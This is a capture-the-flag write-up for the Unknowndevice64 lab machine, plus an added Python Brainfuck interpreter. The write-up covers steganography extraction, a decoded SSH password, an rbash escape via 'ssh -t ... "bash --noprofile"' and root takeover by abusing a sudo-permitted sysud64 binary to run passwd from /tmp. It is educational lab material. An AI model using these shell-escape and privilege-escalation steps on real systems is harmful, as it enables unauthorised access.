Last updated: 15 Apr 24 09:25:47 (UTC)

Complete Unknowndevice64

Unknowndevice64

By Lawcky 18/02/24

Introduction

Difficulty : medium

Additional info:

Name: unknowndevice64: 1
Release date: 9 Mar 2019
Author: Ajay Verma
Series: unknowndevice64


In this write-up

  • Steganography (steghide)
  • rbash escape
  • Privesc using sysud64 binary file

Scans


Write-UP

found in the source code

there is hidden data inside this image

Steganography

after some digging using different tools I understood that the file had a password that was specified in the filename (took some time 😅)

password : h1dd3n

I found Brainfuck code:

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.-----------------.<----------------.--.++++++.---------.>-----------------------.<<+++.++.>+++++.--.++++++++++++.>++++++++++++++++++++++++++++++++++++++++.-----------------.

once executed :

ud64:1M!#64@ud
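
An added example, not part of the original write-up: a small Brainfuck interpreter in Python with a step limit, so code recovered from an artifact like the one above can be run locally rather than pasted into an online interpreter. The names `run_bf` and `PROGRAM` are chosen here; `PROGRAM` is the code shown above written with run lengths.

```python
# The program recovered from the image, written with run lengths to keep
# lines short; it expands to the same instruction sequence.
PROGRAM = (
    "+" * 10 + "[>+>+++>" + "+" * 7 + ">" + "+" * 10 + "<<<<-]>>>>"
    + "+" * 17 + "." + "-" * 17 + ".<" + "-" * 16 + ".--." + "+" * 6 + "."
    + "-" * 9 + ".>" + "-" * 23 + ".<<+++.++.>" + "+" * 5 + ".--."
    + "+" * 12 + ".>" + "+" * 40 + "." + "-" * 17 + "."
)


def run_bf(code, stdin=b"", max_steps=1_000_000, tape_len=30_000):
    """Run Brainfuck `code` and return its output as a string."""
    ops = [c for c in code if c in "+-<>[].,"]  # everything else is a comment
    # Pre-compute matching brackets and reject unbalanced programs up front.
    jump, stack = {}, []
    for i, c in enumerate(ops):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at instruction {i}")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at instruction {stack[-1]}")

    tape, ptr, pc, steps = bytearray(tape_len), 0, 0, 0
    out, inp = bytearray(), iter(stdin)
    while pc < len(ops):
        steps += 1
        if steps > max_steps:  # recovered code may never terminate
            raise RuntimeError("step limit exceeded")
        c = ops[pc]
        if c == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif c == ">":
            ptr = (ptr + 1) % tape_len  # wrap instead of running off the tape
        elif c == "<":
            ptr = (ptr - 1) % tape_len
        elif c == ".":
            out.append(tape[ptr])
        elif c == ",":
            tape[ptr] = next(inp, 0)  # EOF reads as 0
        elif (c == "[" and tape[ptr] == 0) or (c == "]" and tape[ptr] != 0):
            pc = jump[pc]  # jump to the matching bracket
        pc += 1
    return out.decode("latin-1")
```

Calling `run_bf(PROGRAM)` returns the string shown above.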


SSH & RBASH

we are stuck in a restricted bash

tried :

ssh -t ud64@192.168.1.189 -p 1337 --norc --noprofile

doesn't work, and it looks like we cannot execute any binary file/command

worked :

ssh -t ud64@192.168.1.189 -p 1337 "bash --noprofile"


Privilege Escalation

seems like we can run commands as another user while also dynamically changing the PATH environment variable

sudo /usr/bin/sysud64 -E /usr/local/sbin=/home/ud64/prog -u root id

the command has been executed and it looks like it printed all the syscalls made for the command,

let's create a command file in tmp and run it as root to try to get a shell

sudo /usr/bin/sysud64 -u root id works as well, but commands like sh or bash

since I just want to get the root account, let's change the password using this RCE:

at first I tried running the command without any file, but it wasn't stable and did not work well, so let's use the PATH environment variable for this one

the binary file for passwd is inside the /bin dir, let's change it to /tmp using the sysud64 command

sudo /usr/bin/sysud64 -u root -E /bin=/tmp

now let's create the passwd file to execute this command:

echo -e "1234\n1234" | passwd

now let's run:

sudo /usr/bin/sysud64 -u root -E /bin=/tmp passwd

Note: I had to re-enter the password in the sysud64 output 3 times for it to work, so I don't think the first part of the command worked as expected; anyway, it worked

Found the Flag